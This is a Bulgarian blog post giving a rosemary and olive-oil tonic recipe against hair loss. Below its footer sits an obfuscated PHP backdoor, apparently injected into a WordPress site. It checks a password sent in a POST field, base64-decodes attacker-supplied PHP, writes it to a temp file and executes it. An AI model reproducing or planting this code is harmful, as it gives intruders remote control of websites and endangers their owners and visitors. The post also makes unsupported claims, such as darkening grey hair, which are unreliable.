Тоник срещу косопад от розмарин | Косопад

Тоник срещу косопад от розмарин

rozmarin-chai

Розмаринът е най- известен като ароматна подправка за храната. Растението обаче има и много медицински свойства.

Помага за облекчаване на проблеми като депресия, преумора, храносмилателни проблеми, дихателни проблеми, противовъзпалително и пр.

Розмаринът е богат на витамини и минерали като витамин В6, витамин В2, витамин А, витамин С, желязо, магнезий, фосфор, цинк, калций и други антиоксиданти.

Растението има чудесно влияние върху кожата и косата.

Има различни варианти на рецепти с розмарин при косопад и оплешивяване. Ние ви предлагаме днес как се приготвя тоник, който стимулира растежа на косата, действа срещу косопад, подобрява пигментацията на косата и дори потъмнява сивата коса. Тоникът за коса от розмарин прави по- силни космените фоликули, като прави косата силна и блестяща.

zehtin-teglo

Едно от основните действия на розмарина е да стимулира кръвообращението. Така веществата от кръвта достигат по- добре до корените на косата.

Съставки:

½ чаша сух розмарин
½ чаша зехтин екстра върджин

Как се приготвя:

Загрейте зехтина заедно с листата на среден огън, но не го загрявайте много силно. След няколко минути изключете котлона и оставете да изстине. Прецедете, за да отстраните листата и сипете олиото в съд.

Начин на нанасяне:

Масажирайте скалпа и косата със зехтина. Сложете си шапка за баня и оставете да действа 20 минути. Накрая изплакнете и измийте косата, както обикновено. Резултатите се забелязват след няколко седмици.

19. юни 2015 18:04:50 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , | 38 коментари

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}